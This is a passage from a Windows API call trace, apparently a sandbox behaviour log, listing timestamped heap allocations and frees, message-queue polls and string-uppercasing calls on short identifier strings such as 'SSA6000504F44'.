(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa2ab) returned 0x34c2258 [0252.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0252.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1818 [0252.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0252.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0252.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0252.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0252.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0252.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa2ab) returned 0x34d67c8 [0252.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0252.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0252.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0252.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0252.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0252.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0252.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0252.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.241] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0252.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0252.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0252.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0252.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0252.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.246] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0252.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0252.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.247] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0252.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0252.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0252.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.249] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0252.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0252.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.250] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0252.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0252.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0252.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.251] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0252.251] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0252.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.252] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.253] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0252.253] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.254] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.254] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0252.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0252.254] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0252.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0252.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.255] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0252.256] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.256] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0252.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.257] HeapFree (in: hHeap=0x25c0000, 